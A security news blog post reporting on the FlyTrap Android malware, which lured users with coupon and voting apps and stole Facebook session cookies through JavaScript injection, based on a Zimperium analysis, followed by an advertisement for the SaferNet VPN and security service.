FlyTrap Malware Compromises Over 10000 Facebook Accounts

You are currently viewing FlyTrap Malware Compromises Over 10000 Facebook Accounts

FlyTrap Malware is the name given to a new threat facing Android users with Facebook accounts in more than 140 countries. FlyTrap Malware works by stealing sessions cookies and simple social engineering tricks to get its victim’s credentials. This is carried over malicious apps, where users are asked for their Facebook credentials to log in. Researchers at mobile security company Zimperium detected the new malware and noted that the stolen information was accessible to anyone who discovered FlyTrap’s command and control (C2) server.

FlyTrap Malware campaigns have been active since at least march. The hackers behind the malicious application used high-quality design and managed to distribute the apps through the Google Play store, as well as third-party Android stores.

The lure within the apps consists of offers for free coupon codes (for Netflix, Google AdWords) and voting for the favorite soccer team or player, in tune with the delayed UEFA Euro 2020 competition.

In order to get the reward, the user must log in to the app using Facebook credentials, and the authentication occurs on the legitimate social media domain.

FlyTrap Malware
Some of the malicious apps FlyTrap Malware relies on

Due to the apps using the real Facebook single sign-on (SSO) service, they can’t collect users’ credentials. However, FlyTrap Malware uses a JavaScript injection to gather other sensitive information.

“Using this technique, the application opens the legit URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address by injecting malicious JS code”

The information is fed into the hackers C2 server. Over 10,000 Android users in more than 140 countries have fallen for the ploy.

Countries affected by FlyTrap Malware. Source: Zimperium

Researchers found the numbers by looking through FlyTrap Malware’s C2 server. The server is not secured, and the stolen Facebook session cookies are open to anyone on the Internet who knows where to look.

Zimperium’s Aazim Yaswant says in a blog post today that FlyTrap Malware’s C2 server had multiple security vulnerabilities that facilitated access to the stored information.

The researcher notes that accounts on social media platforms are a common target for threat actors, who can use them for fraudulent purposes like artificially boosting the popularity of pages, sites, products, misinformation, or a political message.

He highlights the fact that phishing pages that steal credentials are not the only way to log into the account of an online service. Logging onto the legitimate domain can also come with risks.

“Just like any user manipulation, the high-quality graphics and official-looking login screens are common tactics to have users take action that could reveal sensitive information. In this case, while the user is logging into their official account, the FlyTrap Malware is hijacking the session information for malicious intent” said Aazim Yaswant, Android malware researcher, Zimperium.

FlyTrap Malware Analysis

Note: This analysis is from the Zimperium Report.

Contrary to popular belief that a phishing page is always at the forefront for compromising or hijacking an account, there are ways to hijack sessions even by logging into the original and legit domain. This Trojan exploits one such technique known as JavaScript injection.

Using this technique, the application opens the legit URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address by injecting malicious JS code.

The manipulation of web resources is addressed as cross-principal manipulation (XPM) in the research “An Empirical Study Of Web Resource Manipulation In Real-world Mobile Applications.” Successful login into Facebook by the victim initiates the data exfiltration process and can be seen in the below screenshots of the communication with the C&C server.

Several of the Trojans have the same malicious script and therefore identifies the source of data by the parameter “from_app” as seen in the screenshots below.

The Command & Control server makes use of login credentials for authorizing access to the harvested data. Security vulnerabilities in the C&C server expose the entire database of stolen session cookies to anyone on the internet, further increasing the threat to the victim’s social credibility.

Malicious threat actors are leveraging common user misconceptions that logging into the right domain is always secure irrespective of the application used to log in. The targeted domains are popular social media platforms and this campaign has been exceptionally effective in harvesting social media session data of users from 144 countries. These accounts can be used as a botnet for different purposes: from boosting the popularity of pages/sites/products to spreading misinformation or political propaganda.

Just like any user manipulation, the high-quality graphics and official-looking login screens are common tactics to have users take action that could reveal sensitive information. In this case, while the user is logging into their official account, the FlyTrap Malware is hijacking the session information for malicious intent.

FlyTrap Malware is just one example of the ongoing, active threats against mobile devices aimed at stealing credentials. Mobile endpoints are often treasure troves of unprotected login information to social media accounts, banking applications, enterprise tools, and more. The tools and techniques used by FlyTrap are not novel but are effective due to the lack of advanced mobile endpoint security on these devices. It would not take much for a malicious party to take FlyTrap or any other Trojan and modify it to target even more critical information.

Protection

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employee’s or family members devices; including activity, time spent online, and threats blocked.

Leave a Reply